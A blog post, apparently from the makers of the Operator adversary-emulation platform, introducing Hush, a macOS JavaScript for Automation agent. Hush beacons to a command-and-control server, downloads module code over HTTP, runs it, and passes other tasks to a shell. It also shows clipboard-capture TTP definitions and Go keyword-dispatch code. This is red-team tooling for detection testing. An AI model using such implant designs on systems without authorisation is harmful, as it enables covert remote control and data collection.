RAM'ing agent modules with Operator
Using JXA and Operator to dynamically compose agents during an operation
Today we’re going to talk about macOS, JavaScript for Automation (JXA), and agents that dynamically compose themselves during an operation… I think that’s a cool sentence. In my blog post Keywords to the Kingdom I introduced the concept of modular implants within the Operator ecosystem, but it had some limitations. This post is about overcoming some of those limitations and creating a flexible way to “automatically compose” implants based upon decisions made by Operator’s planner.
What is JXA?
According to Apple’s documentation:
JavaScript for Automation provides the ability to use JavaScript for inter-application communication between apps in OS X.
But what does that actually mean? JXA basically enables developers to write everything from simple scripts to native macOS applications using JavaScript. If you want to read more about JXA, there is a fantastic wiki on GitHub called the JXA Cookbook that demonstrates how you can leverage JXA to build scripts and applications.
JXA has been used for macOS agents before. Probably the most well known is Cody Thomas’ ApFell agent for the Mythic C2 framework; I highly recommend you check out his work if you want to see what a powerful JXA agent looks like.
The problem
Operator’s primary modular agent, PneumaEX, has two primary design issues (at time of writing):
Payloads are not loaded and executed in memory (i.e. modules are dropped to disk)
Modules have to be explicitly tasked to the agent
The issues with payloads being dropped to disk are pretty self-explanatory, so we’re going to skip over that and talk about the second issue.
When I say modules have to be explicitly tasked to an agent, what I mean is that the TTPs require that I specify a module and a payload associated with that module.
Not clear? Yeah, I know :) Let’s use some examples.
Here is what a PneumaEX module TTP looks like:
id: 2897b095-3356-456f-876c-3103f91352ab | |
metadata: | |
version: 1 | |
authors: | |
- khyberspache | |
tags: | |
- thinktank | |
name: Capture clipboard using a module | |
description: | | |
Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes. | |
tactic: collection | |
technique: | |
id: T1115 | |
name: Clipboard Data | |
platforms: | |
darwin: | |
keyword: | |
command: module.collect.captureClipboard | |
payload: "#{operator.payloads}/pneumaEX/collect/collect-darwin" |
I’ve explicitly created a TTP where the command is module.collect.captureClipboard
and it directly requires a payload collect-darwin
as part of the TTP definition.
Right about now, you’re probably asking “why is this suboptimal or bad” (beyond the payload to disk thing)?
Well the idea of Keyword executors in Operator to essentially act as an interface to an agent’s implementation of a Keyword. Ideally that TTP definition would look more like this:
platforms: | |
darwin: | |
keyword: | |
command: collect.captureClipboard |
The difference here is now any agent can implement a collect.captureClipboard
keyword using any methodology, whether it’s building the function directly into the agent OR calling a module.
Bottom line, I want to push implementation down to an agent itself and allow the TTP to act as the interface to those implementations.
Okay so I kinda get it, what does it look like?
In another blog I wrote, See Sharp (and more) in Operator, I provide an example of adding built-in functionality to Pneuma or PneumaEX using this keyword structure:
platforms: | |
windows: | |
keyword: | |
command: api.ps |
As a quick summary of what I discuss in that post, basically what we do is actually write a function called CallNativeAPI
and pass it “ps” as an argument to call a function that we’ve written in Pneuma or PneumaEX. So the agent receives the message, splits it, and jumps down the CallNativeAPI code path:
if executor == "keyword" { | |
task := splitMessage(message, '.') | |
if task[0] == "api" { | |
return CallNativeAPI(task[1]) | |
} else if task[0] == "config" { | |
return updateConfiguration(task[1], agent) | |
} | |
return "Keyword selected not available for agent", 0, 0 | |
} |
Then we have a platform specific implementations of the “ps” keyword implemented inside of Pneuma and PneumaEX:
package commands | |
import ( | |
"encoding/json" | |
"log" | |
"os" | |
"syscall" | |
"unsafe" | |
) | |
func CallNativeAPI(task string) (string, int, int) { | |
switch task { | |
case "ps": | |
log.Print("Running Task") | |
return getProcesses() | |
} | |
return "not implemented", 1, os.Getpid() | |
} |
But nothing is stopping us from making the api.ps
Keyword executor implementation in Pneuma a module. So instead of it being built-in functionality and instead of manually specifying that it should be a module, we just implement it as a module.
Enter Hush agent
Our newest macOS JXA agent does exactly what’s described above. Hush is just a very simple script that consists of basically just 5 functions:
InstallModule - Request a module and install it
RunModule - Run a module
ExecuteTask - Break out instruction parameters and send them to HandleTask
HandleTask - Run a module based upon the requested executor
Run - Agent’s entry point and event loop
That’s it - it doesn’t have anything built-in. No C2, no executors to run TTPs, no malicious code. It’s just a wrapper that receives instructions then figures out whether it needs to resolve and install a module based upon the instruction.
I promise we will loop back around to the api.ps
keyword, but first let’s look at the main agent event loop to get an understanding of how the module resolution works:
function run(argv) { | |
beacon = new Beacon((argv.length > 0) ? (argv[0] || argv) : 'http://localhost:3391', (argv.length > 1) ? argv[1] : 'http'); | |
while (true) { | |
try { | |
let tasks = runModule('c2', beacon.contact, {beacon: beacon}); | |
beacon.Links = tasks.map(task => executeTask(Object.assign(new Instruction(), task, {Pid: beacon.pid}))); | |
} catch (e) { | |
console.log(`Beacon failed. ${e}`) | |
} | |
console.log(`Sleeping for ${beacon.Sleep} seconds`); | |
delay(beacon.Sleep); | |
} | |
} |
When the agent starts, we create a Beacon object that contains agent environment data and then run a module to get tasks for the agent to execute using runModule(‘c2’, beacon.contact, {beacon: beacon});
Looking at the default command line arguments to the agent, HTTP is the default “contact” so we are going to try to run an HTTP module to collect tasks. But Hush doesn’t have a C2 module! It doesn’t have any modules. At the top of the script we have:
let module = {};
So what will happen is runModule
will realize there is no “module.c2.http” object available in the agent and make an HTTP/S request to Operator for an “http.js” module. Once that module is installed, then the module itself contains all of the logic necessary to send a Beacon to Operator and request instructions to execute.
Whew.
Brief pause.
Now time for api.ps
implementation.
Looking at that function, we see that if the C2 module resolves any tasks, we are going to map each task to the executeTask
function. Nothing particularly interesting happens in that function as it primarily sets up the task for the handleTask
function.
Pneuma’s implementation of api.ps
required that we explicitly handle both parts of the keyword (api
and ps
) using switch statements in the code, in addition to actually having the underlying function (getProcesses()
) implemented.
Hush doesn’t do anything like that, instead hush implements that as a module:
if (task[0] === 'api') { | |
if (task[2]) { | |
try { | |
task[2] = JSON.parse(task[2]); | |
} catch (e) { | |
throw new Error("Could not parse module params: "+e.toString()); | |
} | |
} | |
return runModule(task[0], task[1], task[2] || null); | |
} | |
return runModule('shell', link.Executor, {task: link.Request}); |
When Hush receives an api
task it’s going to try to run that module, which as we’ve already seen, will dynamically resolve, install, and run the module. So for api.ps
Hush will check if the module.api.ps
exists, if not, it will request ps.js
from Operator and run the module.
At the bottom of that function, we can also see that if a task doesn’t match the keyword, it’s just going to try and run it using a shell module (module.shell.sh
). This same structure also allows us to swap C2 modules on the fly.
Wrapping up
What has this done for us? We can decrease the number of TTPs that we store inside Operator and instead push some of the implementation complexity down to agents themselves. This has the added benefit of allowing engineers to test various implementations of a TTP in various different agents. In this case, someone using Operator could try running the api.ps
TTP on a macOS system using Hush and PneumaEX and have two completely different methodologies to test for their detection engineering.
I hope this introduces you to something new about Operator and gives you ideas for how you could implement new agents :)